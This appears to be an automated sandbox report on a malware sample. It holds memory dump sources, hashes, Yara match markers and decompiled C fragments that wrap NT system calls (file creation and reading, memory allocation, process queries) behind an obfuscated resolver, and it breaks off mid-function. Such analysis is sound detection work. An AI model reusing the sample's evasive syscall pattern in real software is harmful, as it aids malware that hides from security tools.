                                                                                                                                                  0x0106b041
                                                                                                                                                  0x0106b047
                                                                                                                                                  0x0106b049
                                                                                                                                                  0x0106b04a
                                                                                                                                                  0x0106b04c
                                                                                                                                                  0x0106b04e
                                                                                                                                                  0x0106b04f
                                                                                                                                                  0x0106b055
                                                                                                                                                  0x0106b058
                                                                                                                                                  0x0106b05a
                                                                                                                                                  0x0106b05c
                                                                                                                                                  0x0106b05c
                                                                                                                                                  0x0106b05d
                                                                                                                                                  0x0106b060
                                                                                                                                                  0x0106b064
                                                                                                                                                  0x0106b065
                                                                                                                                                  0x0106b066
                                                                                                                                                  0x0106b068
                                                                                                                                                  0x0106b06a
                                                                                                                                                  0x0106b06b
                                                                                                                                                  0x0106b06d
                                                                                                                                                  0x0106b071
                                                                                                                                                  0x0106b073
                                                                                                                                                  0x0106b074
                                                                                                                                                  0x0106b076
                                                                                                                                                  0x0106b078
                                                                                                                                                  0x0106b079
                                                                                                                                                  0x0106b080
                                                                                                                                                  0x0106b084
                                                                                                                                                  0x0106b086
                                                                                                                                                  0x0106b086
                                                                                                                                                  0x0106b087
                                                                                                                                                  0x0106b08d
                                                                                                                                                  0x0106b093
                                                                                                                                                  0x0106b099
                                                                                                                                                  0x0106b09b
                                                                                                                                                  0x0106b09d
                                                                                                                                                  0x0106b09f
                                                                                                                                                  0x0106b0a1
                                                                                                                                                  0x0106b0a7
                                                                                                                                                  0x0106b0ac
                                                                                                                                                  0x0106b0ae
                                                                                                                                                  0x0106b0b0
                                                                                                                                                  0x0106b0b3
                                                                                                                                                  0x0106b0b5
                                                                                                                                                  0x0106b0b7
                                                                                                                                                  0x0106b0b9
                                                                                                                                                  0x0106b0bb
                                                                                                                                                  0x0106b0bd
                                                                                                                                                  0x0106b0c3
                                                                                                                                                  0x0106b0c6

                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2190512315.0000000000FE2000.00000020.00020000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                  • Associated: 00000004.00000002.2190505990.0000000000FE0000.00000002.00020000.sdmp
                                                                                                                                                  • Associated: 00000004.00000002.2190656875.0000000001074000.00000002.00020000.sdmp
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 0fa2702c39b2f94e33ad6fcd0c474dce385641cc66151680991a7599c9a38469
                                                                                                                                                  • Instruction ID: 33aaa49b78feab893194076d224f072d551bd4e3723e8bb176df951cd8380cec
                                                                                                                                                  • Opcode Fuzzy Hash: 0fa2702c39b2f94e33ad6fcd0c474dce385641cc66151680991a7599c9a38469
                                                                                                                                                  • Instruction Fuzzy Hash: 5232CA6158E3D25FD7138B748CB5682BFB0AE1312571E8ADBC0C1CF5E3E258498AD762
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2190512315.0000000000FE2000.00000020.00020000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                  • Associated: 00000004.00000002.2190505990.0000000000FE0000.00000002.00020000.sdmp
                                                                                                                                                  • Associated: 00000004.00000002.2190656875.0000000001074000.00000002.00020000.sdmp
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 0c2a5b4b7f3f8ea461b6b1aab8ed7093ec20e9203c3e039024cc5d644ab967e1
                                                                                                                                                  • Instruction ID: e61ee6ffe3852d6d6a40e011c34f0ec0fe45c9e8f75b29ad86d5390be57314a7
                                                                                                                                                  • Opcode Fuzzy Hash: 0c2a5b4b7f3f8ea461b6b1aab8ed7093ec20e9203c3e039024cc5d644ab967e1
                                                                                                                                                  • Instruction Fuzzy Hash: 4312EDA284E7D15FD7138B7088B9282BFB0AE17110B1E49EBC4C5CF4A3E21C585ED762
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2190512315.0000000000FE2000.00000020.00020000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                  • Associated: 00000004.00000002.2190505990.0000000000FE0000.00000002.00020000.sdmp
                                                                                                                                                  • Associated: 00000004.00000002.2190656875.0000000001074000.00000002.00020000.sdmp
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: cf6ecb9f93ad06ba9d06a071d797210d6884b797f63ad07f77b88b94dd57d36d
                                                                                                                                                  • Instruction ID: e98493791d28dbcfa9f977e643b0c77319a4115a7f7abf81c673b8b1d79aa61d
                                                                                                                                                  • Opcode Fuzzy Hash: cf6ecb9f93ad06ba9d06a071d797210d6884b797f63ad07f77b88b94dd57d36d
                                                                                                                                                  • Instruction Fuzzy Hash: 4002C9A284E7D19FD7138B704CB9682BFB0AE17110B1E49EBC4C5CB4A3E21C585ED762
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2190512315.0000000000FE2000.00000020.00020000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                  • Associated: 00000004.00000002.2190505990.0000000000FE0000.00000002.00020000.sdmp
                                                                                                                                                  • Associated: 00000004.00000002.2190656875.0000000001074000.00000002.00020000.sdmp
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 895318e4893d33db52da27877b1f22562ab2fc3db991641c2ea07f4298869ebe
                                                                                                                                                  • Instruction ID: effbee842e845a853983ebf3aa77d2e029f407bca151a9595862d2830b078e6f
                                                                                                                                                  • Opcode Fuzzy Hash: 895318e4893d33db52da27877b1f22562ab2fc3db991641c2ea07f4298869ebe
                                                                                                                                                  • Instruction Fuzzy Hash: 1DF1CBA294E7D15FD7138B708CB9282BFB0AE13110B1E49EBC4C5CB4A3E21C585ED762
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Executed Functions

                                                                                                                                                  APIs
                                                                                                                                                  • NtQueryInformationProcess.NTDLL ref: 008B99BF
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2219044296.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InformationProcessQuery
                                                                                                                                                  • String ID: 0
                                                                                                                                                  • API String ID: 1778838933-4108050209
                                                                                                                                                  • Opcode ID: 39eb83527b9dfb0958a03f1802a1a4be67d21b07a2af987d97fec1c560f0ff77
                                                                                                                                                  • Instruction ID: 8252e8d50f91fd4d314005f346cfedeeed6ee687a4caae13f86dea3fdd96ce88
                                                                                                                                                  • Opcode Fuzzy Hash: 39eb83527b9dfb0958a03f1802a1a4be67d21b07a2af987d97fec1c560f0ff77
                                                                                                                                                  • Instruction Fuzzy Hash: 53F13F70918A4D8FDBA9EF68C895AEEB7E0FF98304F40462AE44ED7251DF349641CB41
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 37%
                                                                                                                                                  			E00419E00(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                                                                                                  				void* _t18;
                                                                                                                                                  				void* _t27;
                                                                                                                                                  				intOrPtr* _t28;
                                                                                                                                                  
                                                                                                                                                  				_t13 = _a4;
                                                                                                                                                  				_t28 = _a4 + 0xc48;
                                                                                                                                                  				E0041A950(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                                                                                                                  				_t6 =  &_a32; // 0x414d32
                                                                                                                                                  				_t12 =  &_a8; // 0x414d32
                                                                                                                                                  				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
                                                                                                                                                  				return _t18;
                                                                                                                                                  			}







                                                                                                                                                  APIs
                                                                                                                                                  • NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 00419E45
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileRead
                                                                                                                                                  • String ID: 2MA$2MA
                                                                                                                                                  • API String ID: 2738559852-947276439
                                                                                                                                                  • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                  • Instruction ID: e2eeafcdabc96c90d19f56ab9cfe9238ee24689222a5818d11d4b5cf4f7c0d6d
                                                                                                                                                  • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                  • Instruction Fuzzy Hash: 90F0B7B2210208AFCB14DF89DC91EEB77ADEF8C754F158649BE1D97241D630E851CBA4
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 37%
                                                                                                                                                  			E00419DFE(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                                                                                                  				void* _t18;
                                                                                                                                                  				void* _t27;
                                                                                                                                                  				intOrPtr* _t29;
                                                                                                                                                  				void* _t31;
                                                                                                                                                  
                                                                                                                                                  				_t13 = _a4;
                                                                                                                                                  				_t29 = _a4 + 0xc48;
                                                                                                                                                  				E0041A950(_t27, _t13, _t29,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                                                                                                                  				_t6 =  &_a32; // 0x414d32
                                                                                                                                                  				_t12 =  &_a8; // 0x414d32
                                                                                                                                                  				_t18 =  *((intOrPtr*)( *_t29))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40, 0xec8b550f, _t31); // executed
                                                                                                                                                  				return _t18;
                                                                                                                                                  			}








                                                                                                                                                  APIs
                                                                                                                                                  • NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 00419E45
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileRead
                                                                                                                                                  • String ID: 2MA$2MA
                                                                                                                                                  • API String ID: 2738559852-947276439
                                                                                                                                                  • Opcode ID: 617284fe934c933324e973a831cc1cf02747c2edafee5f07066d04ef82f4e86b
                                                                                                                                                  • Instruction ID: 00c91bf5186e13c8f3e0094703864e9394cd14fab2ca2074de922b77fcf32330
                                                                                                                                                  • Opcode Fuzzy Hash: 617284fe934c933324e973a831cc1cf02747c2edafee5f07066d04ef82f4e86b
                                                                                                                                                  • Instruction Fuzzy Hash: 47F0A4B6200108AFCB14DF89DC91EEB77A9AF8C354F168649BA1DA7251C630E8518BA0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00419D50(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, char _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                                                                                                  				long _t21;
                                                                                                                                                  				void* _t31;
                                                                                                                                                  
                                                                                                                                                  				_t3 = _a4 + 0xc40; // 0xc40
                                                                                                                                                  				E0041A950(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                                                                                                  				_t11 =  &_a20; // 0x414b77
                                                                                                                                                  				_t21 = NtCreateFile(_a8, _a12, _a16,  *_t11, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                                                                                                  				return _t21;
                                                                                                                                                  			}






                                                                                                                                                  APIs
                                                                                                                                                  • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                  • String ID: wKA
                                                                                                                                                  • API String ID: 823142352-3165208591
                                                                                                                                                  • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                  • Instruction ID: 0d977cd1f4fbd36c9bd444ef8f6a04c43f7f15de33bda2cf86b45a3658e1eede
                                                                                                                                                  • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                  • Instruction Fuzzy Hash: BFF0BDB2211208AFCB08CF89DC95EEB77ADAF8C754F158248BA1D97241C630E8518BA4
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 75%
                                                                                                                                                  			E00419D4B(void* __edi, void* __esi, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, char _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                                                                                                  				long _t22;
                                                                                                                                                  				void* _t34;
                                                                                                                                                  				signed int _t37;
                                                                                                                                                  
                                                                                                                                                  				_t34 = __esi + __edi;
                                                                                                                                                  				_t37 =  *(__edi - 0x1374aac3) * 0x8b08458b;
                                                                                                                                                  				_push(_t37);
                                                                                                                                                  				_t16 = _a4;
                                                                                                                                                  				_push(_t34);
                                                                                                                                                  				_t4 = _t16 + 0xc40; // 0xc40
                                                                                                                                                  				E0041A950(__edi, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                                                                                                  				_t12 =  &_a20; // 0x414b77
                                                                                                                                                  				_t22 = NtCreateFile(_a8, _a12, _a16,  *_t12, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                                                                                                  				return _t22;
                                                                                                                                                  			}







                                                                                                                                                  APIs
                                                                                                                                                  • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                  • String ID: wKA
                                                                                                                                                  • API String ID: 823142352-3165208591
                                                                                                                                                  • Opcode ID: 5698370e93231dcaa876b0b3758a9e2ed387f1f8c0451b227f6c083057958c12
                                                                                                                                                  • Instruction ID: 04a2cfd867437525a0971d93455d764c76a25f5f1e9e2778de588e1df1fbb764
                                                                                                                                                  • Opcode Fuzzy Hash: 5698370e93231dcaa876b0b3758a9e2ed387f1f8c0451b227f6c083057958c12
                                                                                                                                                  • Instruction Fuzzy Hash: 72F0F6B2204149ABCB08DF98DC85CDBB7ADBF8C354B05864DFA5C93201D630E8508BA4
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                  • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                  • String ID: wKA
                                                                                                                                                  • API String ID: 823142352-3165208591
                                                                                                                                                  • Opcode ID: 0df0540dcfb7a93cfac3ea25ea307f49f1dc3bbb10a73f40ff662512db58c0a8
                                                                                                                                                  • Instruction ID: 3dc5bac7b2f0fe61b72982d3694b8f2312eed68ad843af8c69f32f3ae199a7d4
                                                                                                                                                  • Opcode Fuzzy Hash: 0df0540dcfb7a93cfac3ea25ea307f49f1dc3bbb10a73f40ff662512db58c0a8
                                                                                                                                                  • Instruction Fuzzy Hash: 18F06CB2614109AF8B48DF98D890DEB73F9BF8C354B159648FA4D93201D631E851CBA5
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2219044296.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseResumeThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2308149497-0
                                                                                                                                                  • Opcode ID: 7b4da7a0d455cc38696462cd40052f2bf395cdaf7ac6e97e0619bd9c66e01c65
                                                                                                                                                  • Instruction ID: 969138365b80a59cb100f30da4cee90daa832aef2713bc8ac7204a4267b1dd05
                                                                                                                                                  • Opcode Fuzzy Hash: 7b4da7a0d455cc38696462cd40052f2bf395cdaf7ac6e97e0619bd9c66e01c65
                                                                                                                                                  • Instruction Fuzzy Hash: F9218E30A14A498FCB64EF69C8887EAB7E0FF88314F40452AE54DC7350EB749981C781
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 79%
                                                                                                                                                  			E00419F2B(void* __ecx, void* __edx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                                                                                                  				long _t14;
                                                                                                                                                  				void* _t25;
                                                                                                                                                  
                                                                                                                                                  				_pop(es);
                                                                                                                                                  				_t10 = _a4;
                                                                                                                                                  				_t3 = _t10 + 0xc60; // 0xca0
                                                                                                                                                  				E0041A950(_t25, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                                                                                                                  				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                                                                                                  				return _t14;
                                                                                                                                                  			}






                                                                                                                                                  APIs
                                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB24,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 00419F69
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2167126740-0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00419F30(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                                                                                                  				long _t14;
                                                                                                                                                  				void* _t21;
                                                                                                                                                  
                                                                                                                                                  				_t3 = _a4 + 0xc60; // 0xca0
                                                                                                                                                  				E0041A950(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                                                                                                                  				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                                                                                                  				return _t14;
                                                                                                                                                  			}






                                                                                                                                                  APIs
                                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB24,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 00419F69
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2167126740-0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                                  			E00419E7A(intOrPtr _a8, void* _a12) {
                                                                                                                                                  				long _t8;
                                                                                                                                                  				void* _t11;
                                                                                                                                                  
                                                                                                                                                  				_pop(_t15);
                                                                                                                                                  				asm("divps xmm6, [edx-0x74aafb60]");
                                                                                                                                                  				_t5 = _a8;
                                                                                                                                                  				_t2 = _t5 + 0x10; // 0x300
                                                                                                                                                  				_t3 = _t5 + 0xc50; // 0x40a913
                                                                                                                                                  				E0041A950(_t11, _a8, _t3,  *_t2, 0, 0x2c);
                                                                                                                                                  				_t8 = NtClose(_a12); // executed
                                                                                                                                                  				return _t8;
                                                                                                                                                  			}






                                                                                                                                                  APIs
                                                                                                                                                  • NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 00419EA5
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Close
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00419E80(intOrPtr _a4, void* _a8) {
                                                                                                                                                  				long _t8;
                                                                                                                                                  				void* _t11;
                                                                                                                                                  
                                                                                                                                                  				_t5 = _a4;
                                                                                                                                                  				_t2 = _t5 + 0x10; // 0x300
                                                                                                                                                  				_t3 = _t5 + 0xc50; // 0x40a913
                                                                                                                                                  				E0041A950(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                                                                                                                  				_t8 = NtClose(_a8); // executed
                                                                                                                                                  				return _t8;
                                                                                                                                                  			}






                                                                                                                                                  APIs
                                                                                                                                                  • NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 00419EA5
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Close
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2220190974.0000000002520000.00000040.00000001.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2220178466.0000000002510000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220294994.0000000002600000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220301799.0000000002610000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220310809.0000000002614000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220316099.0000000002617000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220322466.0000000002620000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220373772.0000000002680000.00000040.00000001.sdmp
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2220190974.0000000002520000.00000040.00000001.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2220178466.0000000002510000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220294994.0000000002600000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220301799.0000000002610000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220310809.0000000002614000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220316099.0000000002617000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220322466.0000000002620000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220373772.0000000002680000.00000040.00000001.sdmp
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2220190974.0000000002520000.00000040.00000001.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2220178466.0000000002510000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220294994.0000000002600000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220301799.0000000002610000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220310809.0000000002614000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220316099.0000000002617000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220322466.0000000002620000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220373772.0000000002680000.00000040.00000001.sdmp
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2220190974.0000000002520000.00000040.00000001.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2220178466.0000000002510000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220294994.0000000002600000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220301799.0000000002610000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220310809.0000000002614000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220316099.0000000002617000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220322466.0000000002620000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220373772.0000000002680000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                                                                                  • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                                                                                                                  • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                                                                                  • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                                  			E00409A80(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                  				char _v24;
                                                                                                                                                  				char _v284;
                                                                                                                                                  				char _v804;
                                                                                                                                                  				char _v840;
                                                                                                                                                  				void* _t24;
                                                                                                                                                  				void* _t31;
                                                                                                                                                  				void* _t33;
                                                                                                                                                  				void* _t34;
                                                                                                                                                  				void* _t39;
                                                                                                                                                  				void* _t52;
                                                                                                                                                  				intOrPtr _t54;
                                                                                                                                                  				void* _t55;
                                                                                                                                                  				void* _t56;
                                                                                                                                                  				void* _t57;
                                                                                                                                                  				void* _t58;
                                                                                                                                                  
                                                                                                                                                  				_t54 = _a4;
                                                                                                                                                  				_t39 = 0; // executed
                                                                                                                                                  				_t24 = E00407E80(__ecx, __edx, _t54,  &_v24); // executed
                                                                                                                                                  				_t56 = _t55 + 8;
                                                                                                                                                  				if(_t24 != 0) {
                                                                                                                                                  					E00408090( &_v24,  &_v840);
                                                                                                                                                  					_t57 = _t56 + 8;
                                                                                                                                                  					do {
